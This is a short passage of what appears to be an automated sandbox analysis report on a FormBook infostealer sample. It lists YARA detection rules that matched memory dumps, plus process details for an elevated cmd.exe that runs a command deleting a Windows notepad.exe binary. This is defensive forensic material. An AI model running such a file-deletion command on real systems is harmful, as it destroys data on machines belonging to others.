                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.1175369847.0000000000260000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.1175496063.0000000000290000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.1175496063.0000000000290000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.1175496063.0000000000290000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.1175496063.0000000000290000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.1175083933.0000000000080000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.1175083933.0000000000080000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.1175083933.0000000000080000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.1175083933.0000000000080000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:moderate

                                                General

                                                Target ID:12
                                                Start time:18:39:25
                                                Start date:08/08/2022
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:/c del "C:\Windows\SysWOW64\notepad.exe"
                                                Imagebase:0x4ab40000
                                                File size:302592 bytes
                                                MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Disassembly

                                                No disassembly